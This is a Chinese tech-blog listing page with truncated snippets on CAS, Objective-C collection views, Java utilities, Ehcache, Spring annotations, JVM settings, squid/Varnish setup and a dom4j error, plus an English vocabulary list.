    由于几年前写了几篇 CAS 系列的文章,之后陆续有人参照文章去实现,可都遇到了各种问题,同时经常或多或少的收到不少人的求助。现在这时特此说明几点: 1.  那些文章发表于好几年前了,CAS 已经更新几个很多版本了,由于近年已经没有做该领域方面的事情,所有文章也没有持续更新。 2. 文章只是提供思路,尽管 CAS 版本已经发生变化,但原理和流程仍然一致。最重要的是明白原理,然后
  • 初二上学期难记单词 dcj3sjt126com englishword
    lesson 课 traffic 交通 matter 要紧;事物 happy 快乐的,幸福的 second 第二的 idea 主意;想法;意见 mean 意味着 important 重要的,重大的 never 从来,决不 afraid 害怕 的 fifth 第五的 hometown 故乡,家乡 discuss 讨论;议论 east 东方的 agree 同意;赞成 bo
  • uicollectionview 纯代码布局, 添加头部视图 dcj3sjt126com Collection
    #import <UIKit/UIKit.h> @interface myHeadView : UICollectionReusableView { UILabel *TitleLable; } -(void)setTextTitle; @end #import "myHeadView.h" @implementation m
  • N 位随机数字串的 JAVA 生成实现 FX夜归人 javaMath随机数Random
    /** * 功能描述 随机数工具类<br /> * @author FengXueYeGuiRen * 创建时间 2014-7-25<br /> */ public class RandomUtil { // 随机数生成器 private static java.util.Random random = new java.util.R
  • Ehcache(09)——缓存Web页面 234390216 ehcache页面缓存
    页面缓存 目录 1       SimplePageCachingFilter 1.1      calculateKey 1.2      可配置的初始化参数 1.2.1     cach
  • spring中少用的注解@primary解析 jackyrong primary
    这次看下spring中少见的注解@primary注解,例子 @Component public class MetalSinger implements Singer{ @Override public String sing(String lyrics) { return "I am singing with DIO voice
  • Java几款性能分析工具的对比 lbwahoo java
    Java几款性能分析工具的对比 摘自:http://my.oschina.net/liux/blog/51800   在给客户的应用程序维护的过程中,我注意到在高负载下的一些性能问题。理论上,增加对应用程序的负载会使性能等比率的下降。然而,我认为性能下降的比率远远高于负载的增加。我也发现,性能可以通过改变应用程序的逻辑来提升,甚至达到极限。为了更详细的了解这一点,我们需要做一些性能
  • JVM参数配置大全 nickys jvm应用服务器
    JVM参数配置大全 /usr/local/jdk/bin/java -Dresin.home=/usr/local/resin -server -Xms1800M -Xmx1800M -Xmn300M -Xss512K -XX:PermSize=300M -XX:MaxPermSize=300M -XX:SurvivorRatio=8 -XX:MaxTenuringThreshold=5 -
  • 搭建 CentOS 6 服务器(14) - squid、Varnish rensanning varnish
    (一)squid 安装 # yum install httpd-tools -y # htpasswd -c -b /etc/squid/passwords squiduser 123456 # yum install squid -y 设置 # cp /etc/squid/squid.conf /etc/squid/squid.conf.bak # vi /etc/
  • Spring缓存注解@Cache使用 tom_seed spring
    参考资料 http://www.ibm.com/developerworks/cn/opensource/os-cn-spring-cache/ http://swiftlet.net/archives/774   缓存注解有以下三个: @Cacheable      @CacheEvict     @CachePut
  • dom4j解析XML时出现"java.lang.noclassdeffounderror: org/jaxen/jaxenexception"错误 xp9802
    java.lang.NoClassDefFoundError: org/jaxen/JaxenExc 关键字: java.lang.noclassdeffounderror: org/jaxen/jaxenexception 使用dom4j解析XML时,要快速获取某个节点的数据,使用XPath是个不错的方法,dom4j的快速手册里也建议使用这种方式 执行时却抛出以下异常: Exceptio
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他